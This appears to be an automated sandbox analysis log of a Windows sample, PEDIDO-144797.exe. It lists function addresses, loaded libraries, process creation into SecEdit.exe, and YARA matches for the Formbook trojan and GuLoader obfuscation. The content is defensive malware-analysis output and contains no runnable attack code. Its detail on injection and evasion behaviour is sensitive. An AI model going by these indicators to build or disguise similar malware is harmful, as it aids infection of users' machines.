        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_327618DA2_2_327618DA
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_327298B22_2_327298B2
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C68822_2_326C6882
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326799E82_2_326799E8
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326F59C02_2_326F59C0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326AE9A02_2_326AE9A0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3276E9A62_2_3276E9A6
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_050D41693_2_050D4169
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_050D31D43_2_050D31D4
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_050D3DD33_2_050D3DD3
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_050D247F3_2_050D247F
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_050D3CB43_2_050D3CB4
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_050D3F393_2_050D3F39
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02EED2EC4_2_02EED2EC
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FB124C4_2_02FB124C
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02EF13804_2_02EF1380
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FBF3304_2_02FBF330
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F0E3104_2_02F0E310
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FB70F14_2_02FB70F1
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F0B0D04_2_02F0B0D0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02EF00A04_2_02EF00A0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F3508C4_2_02F3508C
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FAE0764_2_02FAE076
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F1B1E04_2_02F1B1E0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F051C04_2_02F051C0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F4717A4_2_02F4717A
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F9D1304_2_02F9D130
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FC010E4_2_02FC010E
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02EEF1134_2_02EEF113
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FBF6F64_2_02FBF6F6
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02EFC6E04_2_02EFC6E0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F736EC4_2_02F736EC
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FBA6C04_2_02FBA6C0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F006804_2_02F00680
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F246704_2_02F24670
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FAD6464_2_02FAD646
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F9D62C4_2_02F9D62C
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F1C6004_2_02F1C600
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F027604_2_02F02760
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F0A7604_2_02F0A760
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FB67574_2_02FB6757
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F004454_2_02F00445
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FBF5C94_2_02FBF5C9
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FB75C64_2_02FB75C6
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FCA5264_2_02FCA526
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F1FAA04_2_02F1FAA0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FBFA894_2_02FBFA89
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FBEA5B4_2_02FBEA5B
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FBCA134_2_02FBCA13
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F74BC04_2_02F74BC0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FBFB2E4_2_02FBFB2E
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F00B104_2_02F00B10
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F3DB194_2_02F3DB19
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FB78F34_2_02FB78F3
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FB18DA4_2_02FB18DA
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F028C04_2_02F028C0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F798B24_2_02F798B2
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F168824_2_02F16882
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F098704_2_02F09870
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F1B8704_2_02F1B870
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02EE68684_2_02EE6868
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FBF8724_2_02FBF872
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FA08354_2_02FA0835
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F2E8104_2_02F2E810
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F038004_2_02F03800
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F459C04_2_02F459C0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02EFE9A04_2_02EFE9A0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FBE9A64_2_02FBE9A6
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02EF2EE84_2_02EF2EE8
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FB9ED24_2_02FB9ED2
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F01EB24_2_02F01EB2
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FB0EAD4_2_02FB0EAD
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FA0E6D4_2_02FA0E6D
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F20E504_2_02F20E50
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F42E484_2_02F42E48
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F06FE04_2_02F06FE0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FB1FC64_2_02FB1FC6
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FBEFBF4_2_02FBEFBF
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FBFF634_2_02FBFF63
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F0CF004_2_02F0CF00
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F1FCE04_2_02F1FCE0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FCACEB4_2_02FCACEB
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F18CDF4_2_02F18CDF
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F99C984_2_02F99C98
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F03C604_2_02F03C60
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FB6C694_2_02FB6C69
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FBEC604_2_02FBEC60
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FAEC4C4_2_02FAEC4C
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F0AC204_2_02F0AC20
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02EF0C124_2_02EF0C12
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F9FDF44_2_02F9FDF4
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F09DD04_2_02F09DD0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F12DB04_2_02F12DB0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F00D694_2_02F00D69
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FB7D4C4_2_02FB7D4C
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02FBFD274_2_02FBFD27
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02EFAD004_2_02EFAD00
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02DDEEBA4_2_02DDEEBA
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02DDE3074_2_02DDE307
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02DDE1E84_2_02DDE1E8
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02DDC9B34_2_02DDC9B3
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02DDE69D4_2_02DDE69D
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02DDD7084_2_02DDD708
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02DDE46D4_2_02DDE46D
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: String function: 02F6E692 appears 84 times
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: String function: 02F35050 appears 36 times
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: String function: 02EEB910 appears 266 times
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: String function: 02F47BE4 appears 88 times
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: String function: 02F7EF10 appears 105 times
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: String function: 3269B910 appears 185 times
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: String function: 326F7BE4 appears 70 times
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: String function: 3271E692 appears 59 times
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: String function: 3272EF10 appears 72 times
        Source: PEDIDO-144797.exeStatic PE information: invalid certificate
        Source: PEDIDO-144797.exe, 00000000.00000000.89358556370.0000000000457000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameloyaliteters radierne.exeR vs PEDIDO-144797.exe
        Source: PEDIDO-144797.exe, 00000002.00000003.90053138743.00000000024BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSeCEditj% vs PEDIDO-144797.exe
        Source: PEDIDO-144797.exe, 00000002.00000003.90004392454.00000000325F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PEDIDO-144797.exe
        Source: PEDIDO-144797.exe, 00000002.00000003.90000854380.000000003243F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PEDIDO-144797.exe
        Source: PEDIDO-144797.exe, 00000002.00000000.89609016586.0000000000457000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameloyaliteters radierne.exeR vs PEDIDO-144797.exe
        Source: PEDIDO-144797.exe, 00000002.00000002.90098272622.0000000032940000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PEDIDO-144797.exe
        Source: PEDIDO-144797.exe, 00000002.00000003.90053138743.00000000024C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSeCEditj% vs PEDIDO-144797.exe
        Source: PEDIDO-144797.exe, 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PEDIDO-144797.exe
        Source: PEDIDO-144797.exeBinary or memory string: OriginalFilenameloyaliteters radierne.exeR vs PEDIDO-144797.exe
        Source: PEDIDO-144797.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 00000002.00000002.90098184931.00000000323D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.91632908078.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.91633128931.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engineClassification label: mal100.troj.evad.winEXE@5/8@2/2
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 0_2_00403489 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403489
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 0_2_00404814 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404814
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 0_2_004020FE CoCreateInstance,0_2_004020FE
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeFile created: C:\Users\user\AppData\Local\Temp\nshDBF9.tmpJump to behavior
        Source: PEDIDO-144797.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: PEDIDO-144797.exeReversingLabs: Detection: 34%
        Source: PEDIDO-144797.exeVirustotal: Detection: 38%
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeFile read: C:\Users\user\Desktop\PEDIDO-144797.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\PEDIDO-144797.exe "C:\Users\user\Desktop\PEDIDO-144797.exe"
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeProcess created: C:\Users\user\Desktop\PEDIDO-144797.exe "C:\Users\user\Desktop\PEDIDO-144797.exe"
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\SysWOW64\SecEdit.exe"
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeProcess created: C:\Users\user\Desktop\PEDIDO-144797.exe "C:\Users\user\Desktop\PEDIDO-144797.exe"Jump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\SysWOW64\SecEdit.exe"Jump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: scecli.dllJump to behavior
        Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeFile written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Gaulin.iniJump to behavior
        Source: PEDIDO-144797.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: SecEdit.pdb source: PEDIDO-144797.exe, 00000002.00000003.90053138743.00000000024BA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: PEDIDO-144797.exe, 00000002.00000001.89609492793.0000000000649000.00000020.00000001.01000000.00000007.sdmp
        Source: Binary string: SecEdit.pdbGCTL source: PEDIDO-144797.exe, 00000002.00000003.90053138743.00000000024BA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: PEDIDO-144797.exe, 00000002.00000003.90000854380.000000003231C000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90004392454.00000000324C5000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 00000004.00000002.91633331601.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 00000004.00000002.91633331601.0000000002FED000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 00000004.00000003.90088339001.0000000002D10000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 00000004.00000003.90084646981.0000000002B63000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: PEDIDO-144797.exe, PEDIDO-144797.exe, 00000002.00000003.90000854380.000000003231C000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90004392454.00000000324C5000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, SecEdit.exe, 00000004.00000002.91633331601.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 00000004.00000002.91633331601.0000000002FED000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 00000004.00000003.90088339001.0000000002D10000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 00000004.00000003.90084646981.0000000002B63000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: PEDIDO-144797.exe, 00000002.00000001.89609492793.0000000000649000.00000020.00000001.01000000.00000007.sdmp

        Data Obfuscation

        barindex
        Yara detected GuLoader
        Source: Yara matchFile source: 00000000.00000002.89703248997.000000000340F000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326721AD pushad ; retf 0004h2_2_3267223F
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326797A1 push es; iretd 2_2_326797A8
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A08CD push ecx; mov dword ptr [esp], ecx2_2_326A08D6
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_050CA10F push ecx; ret 3_2_050CA140
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_050C9902 push edi; ret 3_2_050C9904
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_050CA123 push ecx; ret 3_2_050CA140
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_050CA5A2 push esp; retf 3_2_050CA579
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_050C687F push ebx; iretd 3_2_050C6880
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_050C689F push ds; ret 3_2_050C68A0
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_050CA4D6 push esp; retf 3_2_050CA579
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_050D1366 pushfd ; ret 3_2_050D137E
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_050D2376 push esi; iretd 3_2_050D2379
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_050C9ED3 pushfd ; ret 3_2_050C9ED4
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_050D12F4 pushfd ; ret 3_2_050D137E
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02EF08CD push ecx; mov dword ptr [esp], ecx4_2_02EF08D6
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02DD4AD6 push esp; retf 4_2_02DD4AAD
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02DDB2B8 push edi; retf 42F6h4_2_02DDB325
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02DD4A0A push esp; retf 4_2_02DD4AAD
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02DDB89A pushfd ; ret 4_2_02DDB8B2
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02DDC8AA push esi; iretd 4_2_02DDC8AD
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02DE5032 push eax; ret 4_2_02DE5034
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02DDB828 pushfd ; ret 4_2_02DDB8B2
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02DD4657 push ecx; ret 4_2_02DD4674
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02DD4643 push ecx; ret 4_2_02DD4674
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02DD3E36 push edi; ret 4_2_02DD3E38
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02DD4407 pushfd ; ret 4_2_02DD4408
